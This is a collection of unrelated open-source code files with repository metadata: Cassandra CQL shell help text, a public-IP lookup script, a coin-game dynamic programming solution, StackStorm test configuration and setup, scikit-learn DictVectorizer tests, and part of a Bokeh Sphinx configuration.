following:
HELP UPDATE
HELP UPDATE_USING
"""
def help_select_expr(self):
print """
SELECT: Specifying Columns
SELECT name1, name2, name3 FROM ...
SELECT COUNT(*) FROM ...
The SELECT expression determines which columns will appear in the
results and takes the form of a comma separated list of names.
It is worth noting that unlike the projection in a SQL SELECT, there is
no guarantee that the results will contain all of the columns
specified. This is because Cassandra is schema-less and there are no
guarantees that a given column exists.
When the COUNT aggregate function is specified as a column to fetch, a
single row will be returned, with a single column named "count" whose
value is the number of rows from the pre-aggregation resultset.
Currently, COUNT is the only function supported by CQL.
"""
def help_alter_drop(self):
print """
ALTER TABLE: dropping a typed column
ALTER TABLE addamsFamily DROP gender;
An ALTER TABLE ... DROP statement removes the type of a column
from the column family metadata. Dropped columns will immediately
become unavailable in the queries and will not be included in
compacted sstables in the future. If a column is readded, queries
won't return values written before the column was last dropped.
It is assumed that timestamps represent actual time, so if this
is not your case, you should NOT readd previously dropped columns.
Columns can't be dropped from tables defined with COMPACT STORAGE.
"""
def help_create(self):
super(CQL3HelpTopics, self).help_create()
print " HELP CREATE_USER;\n"
def help_alter(self):
print """
ALTER TABLE <tablename> ALTER <columnname> TYPE <type>;
ALTER TABLE <tablename> ADD <columnname> <type>;
ALTER TABLE <tablename> RENAME <columnname> TO <columnname>
[AND <columnname> TO <columnname>]
ALTER TABLE <tablename> WITH <optionname> = <val> [AND <optionname> = <val> [...]];
An ALTER statement is used to manipulate table metadata. It allows you
to add new typed columns, drop existing columns, change the data
storage type of existing columns, or change table properties.
No results are returned.
See one of the following for more information:
HELP ALTER_ALTER;
HELP ALTER_ADD;
HELP ALTER_DROP;
HELP ALTER_RENAME;
HELP ALTER_WITH;
"""
def help_alter_rename(self):
print """
ALTER TABLE: renaming a column
ALTER TABLE <tablename> RENAME <columnname> TO <columnname>
[AND <columnname> TO <columnname>]
The ALTER TABLE ... RENAME variant renames a typed column in a column
family.
"""
def help_drop(self):
super(CQL3HelpTopics, self).help_drop()
print " HELP DROP_USER;\n"
def help_list(self):
print """
There are different variants of LIST. For more information, see
one of the following:
HELP LIST_USERS;
HELP LIST_PERMISSIONS;
"""
def help_create_user(self):
print """
CREATE USER <username> [WITH PASSWORD 'password'] [NOSUPERUSER | SUPERUSER];
CREATE USER creates a new Cassandra user account.
Only superusers can issue CREATE USER requests.
To create a superuser account use SUPERUSER option (NOSUPERUSER is the default).
WITH PASSWORD clause should only be used with password-based authenticators,
e.g. PasswordAuthenticator, SimpleAuthenticator.
"""
def help_alter_user(self):
print """
ALTER USER <username> [WITH PASSWORD 'password'] [NOSUPERUSER | SUPERUSER];
Use ALTER USER to change a user's superuser status and/or password (only
with password-based authenticators).
Superusers can change a user's password or superuser status (except their own).
Users cannot change their own superuser status. Ordinary users can only change their
password (if the configured authenticator is password-based).
"""
def help_drop_user(self):
print """
DROP USER <username>;
DROP USER removes an existing user. You have to be logged in as a superuser
to issue a DROP USER statement. A user cannot drop themselves.
"""
def help_list_users(self):
print """
LIST USERS;
List existing users and their superuser status.
"""
def help_grant(self):
print """
GRANT (<permission> [PERMISSION] | ALL [PERMISSIONS])
ON ALL KEYSPACES
| KEYSPACE <keyspace>
| [TABLE] [<keyspace>.]<table>
TO <username>
Grant the specified permission (or all permissions) on a resource
to a user.
To be able to grant a permission on some resource you have to
have that permission yourself and also AUTHORIZE permission on it,
or on one of its parent resources.
See HELP PERMISSIONS for more info on the available permissions.
"""
def help_revoke(self):
print """
REVOKE (<permission> [PERMISSION] | ALL [PERMISSIONS])
ON ALL KEYSPACES
| KEYSPACE <keyspace>
| [TABLE] [<keyspace>.]<table>
FROM <username>
Revokes the specified permission (or all permissions) on a resource
from a user.
To be able to revoke a permission on some resource you have to
have that permission yourself and also AUTHORIZE permission on it,
or on one of its parent resources.
See HELP PERMISSIONS for more info on the available permissions.
"""
def help_list_permissions(self):
print """
LIST (<permission> [PERMISSION] | ALL [PERMISSIONS])
[ON ALL KEYSPACES
| KEYSPACE <keyspace>
| [TABLE] [<keyspace>.]<table>]
[OF <username>]
[NORECURSIVE]
Omitting ON <resource> part will list permissions on ALL KEYSPACES,
every keyspace and table.
Omitting OF <username> part will list permissions of all users.
Omitting NORECURSIVE specifier will list permissions of the resource
and all its parents (table, table's keyspace and ALL KEYSPACES).
See HELP PERMISSIONS for more info on the available permissions.
"""
def help_permissions(self):
print """
PERMISSIONS
Cassandra has 6 permissions:
        ALTER: required for ALTER KEYSPACE, ALTER TABLE, CREATE INDEX, DROP INDEX
AUTHORIZE: required for GRANT, REVOKE
CREATE: required for CREATE KEYSPACE, CREATE TABLE
DROP: required for DROP KEYSPACE, DROP TABLE
MODIFY: required for INSERT, DELETE, UPDATE, TRUNCATE
SELECT: required for SELECT
"""
|
guanxi55nba/db-improvement
|
pylib/cqlshlib/helptopics.py
|
Python
|
apache-2.0
| 30,976
|
#!/usr/bin/env python
import re,urllib2
class Get_public_ip:
def getip(self):
try:
myip = self.visit("http://ip.chinaz.com/getip.aspx")
except:
try:
myip = self.visit("http://ipv4.icanhazip.com/")
except:
myip = "So sorry!!!"
return myip
    def visit(self, url):
        opener = urllib2.urlopen(url)
        if url == opener.geturl():
            content = opener.read()
            return re.search(r'\d+\.\d+\.\d+\.\d+', content).group(0)
if __name__ == "__main__":
getmyip = Get_public_ip()
print getmyip.getip()
|
PoplarYang/oneinstack-odm
|
include/get_public_ipaddr.py
|
Python
|
apache-2.0
| 536
|
# Consider a row of n coins of values v1 . . . vn, where n is even.
# We play a game against an opponent by alternating turns. In each turn,
# a player selects either the first or last coin from the row, removes it
# from the row permanently, and receives the value of the coin. Determine the
# maximum possible amount of money we can definitely win if we move first.
# Note: The opponent is as clever as the user.
# http://www.geeksforgeeks.org/dynamic-programming-set-31-optimal-strategy-for-a-game/
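# Worked example (illustrative): for coins = [8, 15, 3, 7] the answer is 22.
# Let F(i, j) be the best guaranteed total for the segment coins[i..j]:
#   F(0, 1) = max(8, 15) = 15    F(1, 2) = max(15, 3) = 15    F(2, 3) = max(3, 7) = 7
#   F(0, 3) = max(8 + min(F(2, 3), F(1, 2)),  7 + min(F(1, 2), F(0, 1)))
#           = max(8 + 7, 7 + 15) = 22
# i.e. take 7 first; whichever end the opponent then removes, we still collect 15 more.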
def find_max_val_recur(coins,l,r):
if l + 1 == r:
return max(coins[l],coins[r])
    if l == r:
        return coins[l]
left_choose = coins[l] + min(find_max_val_recur(coins,l+1,r - 1),find_max_val_recur(coins,l+2,r))
right_choose = coins[r] + min(find_max_val_recur(coins,l + 1,r-1),find_max_val_recur(coins,l,r-2))
return max(left_choose,right_choose)
coin_map = {}
def find_max_val_memo(coins,l,r):
if l + 1 == r:
return max(coins[l],coins[r])
    if l == r:
        return coins[l]
if (l,r) in coin_map:
return coin_map[(l,r)]
left_choose = coins[l] + min(find_max_val_memo(coins,l+1,r - 1),find_max_val_memo(coins,l+2,r))
right_choose = coins[r] + min(find_max_val_memo(coins,l + 1,r-1),find_max_val_memo(coins,l,r-2))
max_val = max(left_choose,right_choose)
coin_map[(l,r)] = max_val
return max_val
def find_max_val_bottom_up(coins):
coins_len = len(coins)
table = [[0] * coins_len for i in range(coins_len + 1)]
for gap in range(coins_len):
i = 0
for j in range(gap,coins_len):
# Here x is value of F(i+2, j), y is F(i+1, j-1) and
# z is F(i, j-2) in above recursive formula
x = table[i+2][j] if (i+2) <= j else 0
y = table[i+1][j-1] if (i+1) <= (j-1) else 0
z = table[i][j-2] if i <= (j-2) else 0
table[i][j] = max(coins[i] + min(x,y),coins[j] + min(y,z))
i += 1
return table[0][coins_len - 1]
if __name__=="__main__":
coins = [8,15,3,7]
print(find_max_val_bottom_up(coins))
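    # Illustrative check (added for clarity): the memoized top-down version
    # should agree with the bottom-up table, also printing 22 for these coins.
    print(find_max_val_memo(coins, 0, len(coins) - 1))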
|
bkpathak/Algorithms-collections
|
src/DP/coin_play.py
|
Python
|
apache-2.0
| 2,084
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os
from oslo_config import cfg, types
from st2common import log as logging
import st2common.config as common_config
from st2common.constants.system import DEFAULT_CONFIG_FILE_PATH
from st2common.constants.garbage_collection import DEFAULT_COLLECTION_INTERVAL
from st2common.constants.garbage_collection import DEFAULT_SLEEP_DELAY
from st2common.constants.sensors import DEFAULT_PARTITION_LOADER
from st2tests.fixturesloader import get_fixtures_packs_base_path
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
# Used for tests. For the majority of tests, we want this value to be False.
USE_DEFAULT_CONFIG_FILES = False
def reset():
cfg.CONF.reset()
def parse_args(args=None, coordinator_noop=True):
_setup_config_opts(coordinator_noop=coordinator_noop)
kwargs = {}
if USE_DEFAULT_CONFIG_FILES:
kwargs["default_config_files"] = [DEFAULT_CONFIG_FILE_PATH]
cfg.CONF(args=args or [], **kwargs)
def _setup_config_opts(coordinator_noop=True):
reset()
try:
_register_config_opts()
except Exception as e:
print(e)
# Some scripts register the options themselves which means registering them again will
# cause a non-fatal exception
return
_override_config_opts(coordinator_noop=coordinator_noop)
def _override_config_opts(coordinator_noop=False):
_override_db_opts()
_override_common_opts()
_override_api_opts()
_override_keyvalue_opts()
_override_scheduler_opts()
_override_workflow_engine_opts()
_override_coordinator_opts(noop=coordinator_noop)
def _register_config_opts():
_register_common_opts()
_register_api_opts()
_register_stream_opts()
_register_auth_opts()
_register_action_sensor_opts()
_register_ssh_runner_opts()
_register_scheduler_opts()
_register_exporter_opts()
_register_sensor_container_opts()
_register_garbage_collector_opts()
def _override_db_opts():
CONF.set_override(name="db_name", override="st2-test", group="database")
CONF.set_override(name="host", override="127.0.0.1", group="database")
def _override_common_opts():
packs_base_path = get_fixtures_packs_base_path()
CONF.set_override(name="base_path", override=packs_base_path, group="system")
CONF.set_override(name="validate_output_schema", override=True, group="system")
CONF.set_override(
name="system_packs_base_path", override=packs_base_path, group="content"
)
CONF.set_override(
name="packs_base_paths", override=packs_base_path, group="content"
)
CONF.set_override(name="api_url", override="http://127.0.0.1", group="auth")
CONF.set_override(name="mask_secrets", override=True, group="log")
CONF.set_override(name="stream_output", override=False, group="actionrunner")
def _override_api_opts():
CONF.set_override(
name="allow_origin",
override=["http://127.0.0.1:3000", "http://dev"],
group="api",
)
def _override_keyvalue_opts():
current_file_path = os.path.dirname(__file__)
rel_st2_base_path = os.path.join(current_file_path, "../..")
abs_st2_base_path = os.path.abspath(rel_st2_base_path)
rel_enc_key_path = "st2tests/conf/st2_kvstore_tests.crypto.key.json"
ovr_enc_key_path = os.path.join(abs_st2_base_path, rel_enc_key_path)
CONF.set_override(
name="encryption_key_path", override=ovr_enc_key_path, group="keyvalue"
)
def _override_scheduler_opts():
CONF.set_override(name="sleep_interval", group="scheduler", override=0.01)
def _override_coordinator_opts(noop=False):
driver = None if noop else "zake://"
CONF.set_override(name="url", override=driver, group="coordination")
CONF.set_override(name="lock_timeout", override=1, group="coordination")
def _override_workflow_engine_opts():
cfg.CONF.set_override("retry_stop_max_msec", 500, group="workflow_engine")
cfg.CONF.set_override("retry_wait_fixed_msec", 100, group="workflow_engine")
cfg.CONF.set_override("retry_max_jitter_msec", 100, group="workflow_engine")
cfg.CONF.set_override("gc_max_idle_sec", 1, group="workflow_engine")
def _register_common_opts():
try:
common_config.register_opts(ignore_errors=True)
except:
LOG.exception("Common config registration failed.")
def _register_api_opts():
# XXX: note : template_path value only works if started from the top-level of the codebase.
# Brittle!
pecan_opts = [
cfg.StrOpt(
"root",
default="st2api.controllers.root.RootController",
help="Pecan root controller",
),
cfg.StrOpt("template_path", default="%(confdir)s/st2api/st2api/templates"),
cfg.ListOpt("modules", default=["st2api"]),
cfg.BoolOpt("debug", default=True),
cfg.BoolOpt("auth_enable", default=True),
cfg.DictOpt("errors", default={404: "/error/404", "__force_dict__": True}),
]
_register_opts(pecan_opts, group="api_pecan")
api_opts = [
cfg.BoolOpt("debug", default=True),
cfg.IntOpt(
"max_page_size",
default=100,
help="Maximum limit (page size) argument which can be specified by the user in a query "
"string. If a larger value is provided, it will default to this value.",
),
]
_register_opts(api_opts, group="api")
messaging_opts = [
cfg.StrOpt(
"url",
default="amqp://guest:guest@127.0.0.1:5672//",
help="URL of the messaging server.",
),
cfg.ListOpt(
"cluster_urls",
default=[],
help="URL of all the nodes in a messaging service cluster.",
),
cfg.IntOpt(
"connection_retries",
default=10,
help="How many times should we retry connection before failing.",
),
cfg.IntOpt(
"connection_retry_wait",
default=10000,
help="How long should we wait between connection retries.",
),
cfg.BoolOpt(
"ssl",
default=False,
help="Use SSL / TLS to connect to the messaging server. Same as "
'appending "?ssl=true" at the end of the connection URL string.',
),
cfg.StrOpt(
"ssl_keyfile",
default=None,
help="Private keyfile used to identify the local connection against RabbitMQ.",
),
cfg.StrOpt(
"ssl_certfile",
default=None,
help="Certificate file used to identify the local connection (client).",
),
cfg.StrOpt(
"ssl_cert_reqs",
default=None,
choices="none, optional, required",
help="Specifies whether a certificate is required from the other side of the "
"connection, and whether it will be validated if provided.",
),
cfg.StrOpt(
"ssl_ca_certs",
default=None,
help="ca_certs file contains a set of concatenated CA certificates, which are "
"used to validate certificates passed from RabbitMQ.",
),
cfg.StrOpt(
"login_method",
default=None,
help="Login method to use (AMQPLAIN, PLAIN, EXTERNAL, etc.).",
),
]
_register_opts(messaging_opts, group="messaging")
ssh_runner_opts = [
cfg.StrOpt(
"remote_dir",
default="/tmp",
help="Location of the script on the remote filesystem.",
),
cfg.BoolOpt(
"allow_partial_failure",
default=False,
help="How partial success of actions run on multiple nodes should be treated.",
),
cfg.BoolOpt(
"use_ssh_config",
default=False,
help="Use the .ssh/config file. Useful to override ports etc.",
),
]
_register_opts(ssh_runner_opts, group="ssh_runner")
def _register_stream_opts():
stream_opts = [
cfg.IntOpt(
"heartbeat",
default=25,
help="Send empty message every N seconds to keep connection open",
),
cfg.BoolOpt("debug", default=False, help="Specify to enable debug mode."),
]
_register_opts(stream_opts, group="stream")
def _register_auth_opts():
auth_opts = [
cfg.StrOpt("host", default="127.0.0.1"),
cfg.IntOpt("port", default=9100),
cfg.BoolOpt("use_ssl", default=False),
cfg.StrOpt("mode", default="proxy"),
cfg.StrOpt("backend", default="flat_file"),
cfg.StrOpt("backend_kwargs", default=None),
cfg.StrOpt("logging", default="conf/logging.conf"),
cfg.IntOpt("token_ttl", default=86400, help="Access token ttl in seconds."),
cfg.BoolOpt("sso", default=True),
cfg.StrOpt("sso_backend", default="noop"),
cfg.StrOpt("sso_backend_kwargs", default=None),
cfg.BoolOpt("debug", default=True),
]
_register_opts(auth_opts, group="auth")
def _register_action_sensor_opts():
action_sensor_opts = [
cfg.BoolOpt(
"enable",
default=True,
help="Whether to enable or disable the ability to post a trigger on action.",
),
cfg.StrOpt(
"triggers_base_url",
default="http://127.0.0.1:9101/v1/triggertypes/",
help="URL for action sensor to post TriggerType.",
),
cfg.IntOpt(
"request_timeout",
default=1,
help="Timeout value of all httprequests made by action sensor.",
),
cfg.IntOpt(
"max_attempts", default=10, help="No. of times to retry registration."
),
cfg.IntOpt(
"retry_wait",
default=1,
help="Amount of time to wait prior to retrying a request.",
),
]
_register_opts(action_sensor_opts, group="action_sensor")
def _register_ssh_runner_opts():
ssh_runner_opts = [
cfg.BoolOpt(
"use_ssh_config",
default=False,
help="Use the .ssh/config file. Useful to override ports etc.",
),
cfg.StrOpt(
"remote_dir",
default="/tmp",
help="Location of the script on the remote filesystem.",
),
cfg.BoolOpt(
"allow_partial_failure",
default=False,
help="How partial success of actions run on multiple nodes should be treated.",
),
cfg.IntOpt(
"max_parallel_actions",
default=50,
help="Max number of parallel remote SSH actions that should be run. "
"Works only with Paramiko SSH runner.",
),
]
_register_opts(ssh_runner_opts, group="ssh_runner")
def _register_scheduler_opts():
scheduler_opts = [
cfg.FloatOpt(
"execution_scheduling_timeout_threshold_min",
default=1,
help="How long GC to search back in minutes for orphaned scheduled actions",
),
cfg.IntOpt(
"pool_size",
default=10,
help="The size of the pool used by the scheduler for scheduling executions.",
),
cfg.FloatOpt(
"sleep_interval",
default=0.01,
help="How long to sleep between each action scheduler main loop run interval (in ms).",
),
cfg.FloatOpt(
"gc_interval",
default=5,
help="How often to look for zombie executions before rescheduling them (in ms).",
),
cfg.IntOpt(
"retry_max_attempt",
default=3,
help="The maximum number of attempts that the scheduler retries on error.",
),
cfg.IntOpt(
"retry_wait_msec",
default=100,
help="The number of milliseconds to wait in between retries.",
),
]
_register_opts(scheduler_opts, group="scheduler")
def _register_exporter_opts():
exporter_opts = [
cfg.StrOpt(
"dump_dir",
default="/opt/stackstorm/exports/",
help="Directory to dump data to.",
)
]
_register_opts(exporter_opts, group="exporter")
def _register_sensor_container_opts():
partition_opts = [
cfg.StrOpt(
"sensor_node_name", default="sensornode1", help="name of the sensor node."
),
cfg.Opt(
"partition_provider",
type=types.Dict(value_type=types.String()),
default={"name": DEFAULT_PARTITION_LOADER},
help="Provider of sensor node partition config.",
),
]
_register_opts(partition_opts, group="sensorcontainer")
# Other options
other_opts = [
cfg.BoolOpt(
"single_sensor_mode",
default=False,
help="Run in a single sensor mode where parent process exits when a sensor crashes / "
"dies. This is useful in environments where partitioning, sensor process life "
"cycle and failover is handled by a 3rd party service such as kubernetes.",
)
]
_register_opts(other_opts, group="sensorcontainer")
# CLI options
cli_opts = [
cfg.StrOpt(
"sensor-ref",
help="Only run sensor with the provided reference. Value is of the form "
"<pack>.<sensor-name> (e.g. linux.FileWatchSensor).",
),
cfg.BoolOpt(
"single-sensor-mode",
default=False,
help="Run in a single sensor mode where parent process exits when a sensor crashes / "
"dies. This is useful in environments where partitioning, sensor process life "
"cycle and failover is handled by a 3rd party service such as kubernetes.",
),
]
_register_cli_opts(cli_opts)
def _register_garbage_collector_opts():
common_opts = [
cfg.IntOpt(
"collection_interval",
default=DEFAULT_COLLECTION_INTERVAL,
help="How often to check database for old data and perform garbage collection.",
),
cfg.FloatOpt(
"sleep_delay",
default=DEFAULT_SLEEP_DELAY,
help="How long to wait / sleep (in seconds) between "
"collection of different object types.",
),
]
_register_opts(common_opts, group="garbagecollector")
ttl_opts = [
cfg.IntOpt(
"action_executions_ttl",
default=None,
help="Action executions and related objects (live actions, action output "
"objects) older than this value (days) will be automatically deleted.",
),
cfg.IntOpt(
"action_executions_output_ttl",
default=7,
help="Action execution output objects (ones generated by action output "
"streaming) older than this value (days) will be automatically deleted.",
),
cfg.IntOpt(
"trigger_instances_ttl",
default=None,
help="Trigger instances older than this value (days) will be automatically deleted.",
),
]
_register_opts(ttl_opts, group="garbagecollector")
inquiry_opts = [
cfg.BoolOpt(
"purge_inquiries",
default=False,
help="Set to True to perform garbage collection on Inquiries (based on "
"the TTL value per Inquiry)",
)
]
_register_opts(inquiry_opts, group="garbagecollector")
def _register_opts(opts, group=None):
CONF.register_opts(opts, group)
def _register_cli_opts(opts):
cfg.CONF.register_cli_opts(opts)
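# Illustrative usage sketch (not part of the original module): a test suite
# typically calls parse_args() once before reading cfg.CONF, e.g.
#
#     from st2tests import config as tests_config
#     tests_config.parse_args()
#     assert cfg.CONF.database.db_name == 'st2-test'   # override applied in _override_db_opts()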
|
StackStorm/st2
|
st2tests/st2tests/config.py
|
Python
|
apache-2.0
| 16,363
|
# -*- coding: utf-8 -*-
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import os.path
from setuptools import setup, find_packages
from dist_utils import fetch_requirements
from dist_utils import apply_vagrant_workaround
from st2actions import __version__
ST2_COMPONENT = "st2actions"
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
REQUIREMENTS_FILE = os.path.join(BASE_DIR, "requirements.txt")
install_reqs, dep_links = fetch_requirements(REQUIREMENTS_FILE)
apply_vagrant_workaround()
setup(
name=ST2_COMPONENT,
version=__version__,
description="{} StackStorm event-driven automation platform component".format(
ST2_COMPONENT
),
author="StackStorm",
author_email="info@stackstorm.com",
license="Apache License (2.0)",
url="https://stackstorm.com/",
install_requires=install_reqs,
dependency_links=dep_links,
test_suite=ST2_COMPONENT,
zip_safe=False,
include_package_data=True,
packages=find_packages(exclude=["setuptools", "tests"]),
scripts=[
"bin/st2actionrunner",
"bin/st2notifier",
"bin/st2workflowengine",
"bin/st2scheduler",
],
)
|
StackStorm/st2
|
st2actions/setup.py
|
Python
|
apache-2.0
| 1,772
|
# Authors: Lars Buitinck
# Dan Blanchard <dblanchard@ets.org>
# License: BSD 3 clause
from random import Random
import numpy as np
import scipy.sparse as sp
from numpy.testing import assert_array_equal
from numpy.testing import assert_allclose
import pytest
from sklearn.feature_extraction import DictVectorizer
from sklearn.feature_selection import SelectKBest, chi2
@pytest.mark.parametrize("sparse", (True, False))
@pytest.mark.parametrize("dtype", (int, np.float32, np.int16))
@pytest.mark.parametrize("sort", (True, False))
@pytest.mark.parametrize("iterable", (True, False))
def test_dictvectorizer(sparse, dtype, sort, iterable):
D = [{"foo": 1, "bar": 3}, {"bar": 4, "baz": 2}, {"bar": 1, "quux": 1, "quuux": 2}]
v = DictVectorizer(sparse=sparse, dtype=dtype, sort=sort)
X = v.fit_transform(iter(D) if iterable else D)
assert sp.issparse(X) == sparse
assert X.shape == (3, 5)
assert X.sum() == 14
assert v.inverse_transform(X) == D
if sparse:
# CSR matrices can't be compared for equality
assert_array_equal(X.A, v.transform(iter(D) if iterable else D).A)
else:
assert_array_equal(X, v.transform(iter(D) if iterable else D))
if sort:
assert v.feature_names_ == sorted(v.feature_names_)
def test_feature_selection():
# make two feature dicts with two useful features and a bunch of useless
# ones, in terms of chi2
d1 = dict([("useless%d" % i, 10) for i in range(20)], useful1=1, useful2=20)
d2 = dict([("useless%d" % i, 10) for i in range(20)], useful1=20, useful2=1)
for indices in (True, False):
v = DictVectorizer().fit([d1, d2])
X = v.transform([d1, d2])
sel = SelectKBest(chi2, k=2).fit(X, [0, 1])
v.restrict(sel.get_support(indices=indices), indices=indices)
assert v.get_feature_names() == ["useful1", "useful2"]
def test_one_of_k():
D_in = [
{"version": "1", "ham": 2},
{"version": "2", "spam": 0.3},
{"version=3": True, "spam": -1},
]
v = DictVectorizer()
X = v.fit_transform(D_in)
assert X.shape == (3, 5)
D_out = v.inverse_transform(X)
assert D_out[0] == {"version=1": 1, "ham": 2}
names = v.get_feature_names()
assert "version=2" in names
assert "version" not in names
def test_iterable_value():
D_names = ["ham", "spam", "version=1", "version=2", "version=3"]
X_expected = [
[2.0, 0.0, 2.0, 1.0, 0.0],
[0.0, 0.3, 0.0, 1.0, 0.0],
[0.0, -1.0, 0.0, 0.0, 1.0],
]
D_in = [
{"version": ["1", "2", "1"], "ham": 2},
{"version": "2", "spam": 0.3},
{"version=3": True, "spam": -1},
]
v = DictVectorizer()
X = v.fit_transform(D_in)
X = X.toarray()
assert_array_equal(X, X_expected)
D_out = v.inverse_transform(X)
assert D_out[0] == {"version=1": 2, "version=2": 1, "ham": 2}
names = v.get_feature_names()
assert names == D_names
def test_iterable_not_string_error():
error_value = (
"Unsupported type <class 'int'> in iterable value. "
"Only iterables of string are supported."
)
D2 = [{"foo": "1", "bar": "2"}, {"foo": "3", "baz": "1"}, {"foo": [1, "three"]}]
v = DictVectorizer(sparse=False)
with pytest.raises(TypeError) as error:
v.fit(D2)
assert str(error.value) == error_value
def test_mapping_error():
error_value = (
"Unsupported value type <class 'dict'> "
"for foo: {'one': 1, 'three': 3}.\n"
"Mapping objects are not supported."
)
D2 = [
{"foo": "1", "bar": "2"},
{"foo": "3", "baz": "1"},
{"foo": {"one": 1, "three": 3}},
]
v = DictVectorizer(sparse=False)
with pytest.raises(TypeError) as error:
v.fit(D2)
assert str(error.value) == error_value
def test_unseen_or_no_features():
D = [{"camelot": 0, "spamalot": 1}]
for sparse in [True, False]:
v = DictVectorizer(sparse=sparse).fit(D)
X = v.transform({"push the pram a lot": 2})
if sparse:
X = X.toarray()
assert_array_equal(X, np.zeros((1, 2)))
X = v.transform({})
if sparse:
X = X.toarray()
assert_array_equal(X, np.zeros((1, 2)))
try:
v.transform([])
except ValueError as e:
assert "empty" in str(e)
def test_deterministic_vocabulary():
# Generate equal dictionaries with different memory layouts
items = [("%03d" % i, i) for i in range(1000)]
rng = Random(42)
d_sorted = dict(items)
rng.shuffle(items)
d_shuffled = dict(items)
# check that the memory layout does not impact the resulting vocabulary
v_1 = DictVectorizer().fit([d_sorted])
v_2 = DictVectorizer().fit([d_shuffled])
assert v_1.vocabulary_ == v_2.vocabulary_
def test_n_features_in():
# For vectorizers, n_features_in_ does not make sense and does not exist.
dv = DictVectorizer()
assert not hasattr(dv, "n_features_in_")
d = [{"foo": 1, "bar": 2}, {"foo": 3, "baz": 1}]
dv.fit(d)
assert not hasattr(dv, "n_features_in_")
def test_dictvectorizer_dense_sparse_equivalence():
"""Check the equivalence between between sparse and dense DictVectorizer.
Non-regression test for:
https://github.com/scikit-learn/scikit-learn/issues/19978
"""
movie_entry_fit = [
{"category": ["thriller", "drama"], "year": 2003},
{"category": ["animation", "family"], "year": 2011},
{"year": 1974},
]
movie_entry_transform = [{"category": ["thriller"], "unseen_feature": "3"}]
dense_vectorizer = DictVectorizer(sparse=False)
sparse_vectorizer = DictVectorizer(sparse=True)
dense_vector_fit = dense_vectorizer.fit_transform(movie_entry_fit)
sparse_vector_fit = sparse_vectorizer.fit_transform(movie_entry_fit)
assert not sp.issparse(dense_vector_fit)
assert sp.issparse(sparse_vector_fit)
assert_allclose(dense_vector_fit, sparse_vector_fit.toarray())
dense_vector_transform = dense_vectorizer.transform(movie_entry_transform)
sparse_vector_transform = sparse_vectorizer.transform(movie_entry_transform)
assert not sp.issparse(dense_vector_transform)
assert sp.issparse(sparse_vector_transform)
assert_allclose(dense_vector_transform, sparse_vector_transform.toarray())
dense_inverse_transform = dense_vectorizer.inverse_transform(dense_vector_transform)
sparse_inverse_transform = sparse_vectorizer.inverse_transform(
sparse_vector_transform
)
expected_inverse = [{"category=thriller": 1.0}]
assert dense_inverse_transform == expected_inverse
assert sparse_inverse_transform == expected_inverse
def test_dict_vectorizer_unsupported_value_type():
"""Check that we raise an error when the value associated to a feature
is not supported.
Non-regression test for:
https://github.com/scikit-learn/scikit-learn/issues/19489
"""
class A:
pass
vectorizer = DictVectorizer(sparse=True)
X = [{"foo": A()}]
err_msg = "Unsupported value Type"
with pytest.raises(TypeError, match=err_msg):
vectorizer.fit_transform(X)
|
huzq/scikit-learn
|
sklearn/feature_extraction/tests/test_dict_vectorizer.py
|
Python
|
bsd-3-clause
| 7,189
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from os.path import abspath, dirname, join
#
# Bokeh documentation build configuration file, created by
# sphinx-quickstart on Sat Oct 12 23:43:03 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.7'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.ifconfig',
'sphinx.ext.napoleon',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
'bokeh.sphinxext.bokeh_autodoc',
'bokeh.sphinxext.bokeh_color',
'bokeh.sphinxext.bokeh_enum',
'bokeh.sphinxext.bokeh_gallery',
'bokeh.sphinxext.bokeh_github',
'bokeh.sphinxext.bokeh_jinja',
'bokeh.sphinxext.bokeh_model',
'bokeh.sphinxext.bokeh_options',
'bokeh.sphinxext.bokeh_palette',
'bokeh.sphinxext.bokeh_palette_group',
'bokeh.sphinxext.bokeh_plot',
'bokeh.sphinxext.bokeh_prop',
'bokeh.sphinxext.bokeh_releases',
'bokeh.sphinxext.bokeh_sitemap',
'bokeh.sphinxext.collapsible_code_block',
]
napoleon_include_init_with_doc = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Bokeh'
copyright = '© Copyright 2015-2018, Anaconda and Bokeh Contributors.'
# Get the standard computed Bokeh version string to use for |version|
# and |release|
from bokeh import __version__
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# Check for version override (e.g. when re-deploying a previously released
# docs, or when pushing test docs that do not have a corresponding BokehJS
# available on CDN)
from bokeh.settings import settings
if settings.docs_version():
version = release = settings.docs_version()
# get all the versions that will appear in the version dropdown
f = open(join(dirname(abspath(__file__)), "all_versions.txt"))
all_versions = [x.strip() for x in reversed(f.readlines())]
# The language for content autogenerated by Sphinx. Refer to documentation
